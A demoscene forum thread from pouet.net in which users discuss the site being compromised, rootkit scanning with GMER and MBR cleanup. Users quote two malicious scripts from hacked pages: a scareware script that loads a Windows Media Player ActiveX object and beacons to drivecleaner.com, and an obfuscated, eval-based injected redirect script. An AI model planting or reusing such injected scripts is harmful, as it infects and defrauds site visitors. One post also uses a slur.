POUET.NET is hacked / infected with a javascript worm
category: general [glöplog]
ryg: thanks for telling that. i think neither my work pc nor my home pc are infected in that case. so, still leaves me there wondering how the hell the pain site was hacked then?
  
i was pretty shocked to see some suspicious output by GMER, but later i figured out that DISABLING antivir is not enough, you need to uninstall it. after that GMER could not find anything. 
a listing of a "positive" GMER output would have been quite helpful, i suffered two late hours of painful doubt. checking the bootblock would not help in my case because it's a grub.
  
gmer lists all the drivers hooking under the windows kernel, like rootkits but also antivirus, cd emulators like daemon tools, encryption layers like drivecrypt, disk imaging tools like true image, etc...
  
yeh, but does it actually tell you if it finds a known rootkit, or does it just list and let the user suffer from doubts? :)
  
it marks everything truly suspicious as red.
  
By the way, for those who got the MBR rootkit in, you need to use fixmbr only from a CD and not from the recovery console booted from the hdd. (For obvious reasons, the rootkit does not want you to overwrite it ;)
  
A friend of mine helped me analyze the different MBRs and they all seem to be "normal"... also, i can't find anything in sectors 60-62, so there's probably no MBR rootkit (and hopefully no other rootkit) - Did anybody notice changes in his system (popups etc.) which are described on different websites?
  
It was the valves-wholesale guy!
  
hmm it works only on winxp sp2?
strange stuff..
  
Code:
	is_XP_SP2     = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
	is_IE=false;
	if (navigator.appName.toLowerCase()=='microsoft internet explorer')
	{
		if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) 	{	is_IE=true;	}
	}	
	
is_opera  = (navigator.userAgent.indexOf("opera") != -1);
is_mac 	  = (navigator.userAgent.indexOf("mac") != -1);
is_mac_ie = (is_IE && is_mac);
is_win_ie = (is_IE && !is_mac);
is_gecko  = (navigator.product == "Gecko");
function OkClicked(){
	}
if(is_XP_SP2) {
	var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
	document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>");
}
function onLoadPage()
{
	bResult = confirm('Multiple System Errors Detected. Click OK To Fix');
	if (bResult)
	{
		OkClicked();
		document.location.href("");
	}
}
var redirect_ad = 'keyin_tbn_nl_en';
var redirect_link    = 'keyin';
function check_cookies()
{
	document.cookie="foo=test; path=/; expires=Mon, 31-Dec-2007 00:00:00 GMT";
	myVar = getCookie("foo");
	if (myVar == "test")
	{
		Img = new Image();
		Img.src = 'http://drivecleaner.com/.freeware/test.php?cookie=1';
	}
	else
	{
		Img = new Image();
		Img.src = 'http://drivecleaner.com/.freeware/test.php?cookie=2';
	}
}
function getCookie(name) {
	var cookie = " " + document.cookie;
	var search = " " + name + "=";
	var setStr = null;
	var offset = 0;
	var end = 0;
	if (cookie.length > 0) {
		offset = cookie.indexOf(search);
		if (offset != -1) {
			offset += search.length;
			end = cookie.indexOf(";", offset)
			if (end == -1) {
				end = cookie.length;
			}
			setStr = unescape(cookie.substring(offset, end));
		}
	}
	return(setStr);
}
check_cookies();
What's that ?
Checking the user agent is just plain wrong. Browsers have been faking it for years!
The classId 6BF52A52-394A-11D3-B153-00C04F79FAA6 refers to Windows Media Player 7 and there seem to be a bunch of exploits with it to load/execute arbitrary files
  
I mean, where did you get that script ?
  
When I was redirected to http://e.pepato.org/e/adsr.php?t=0, it turned out that someone had hacked the server and altered the webpage with the following code:
  
Code:
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else 
      if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
Pretty annoying, but easy to fix.
Well, that's why I use firefox with no-script installed. Nobody getting through that way without my permission!
  
You don't need Firefox and an extension to disable scripting, but hey, whatever makes you feel safe.
Even in IE scripting can be disabled.
  
Does that MBR faggotery affect GRUB or is it just the windows MBR thingy?
  
Hey, IE's anti-script is not under your direct on-the-fly control like NoScript is. NoScript does a lot more than JavaScript too, look it up. It's one of my favourite damage control tools for web browsing, because it's fast, not annoying, and easy to use.
  
Oh, and I'm not Winblowz either...
  
arfink, you must be very rad
  
Well, maybe it would be simpler just to block all Javascript which had a call to 'eval' in it.
  
Lord Graga: some antivirus programs do check that for you by parsing all HTTP traffic (i'm using Kaspersky for example).
  
Lord Graga: or Function( "somecode") or setTimeout( "somecode", delay ) or setInterval( "somecode", delay )
  
@all: thanks for this information
I'm not infected
I use FF with QuickJava Button
NoScript sometimes causes task freezes on FF
  
@ClassicCan,
got this, too. Posted in "fix me beautiful". Which Server? Was not able to find it that time.
  
p01: who doesn't use that in WEB2.0 dev? =)
  
confused:
http://pouet.net/topic.php?which=1024&page=378
first time I got redirected was 17.01.2007 (see link) and nobody had any reaction here.
stijn also had the same problem. Isn't it the same piece of code?
Actually found nothing with gmer.
  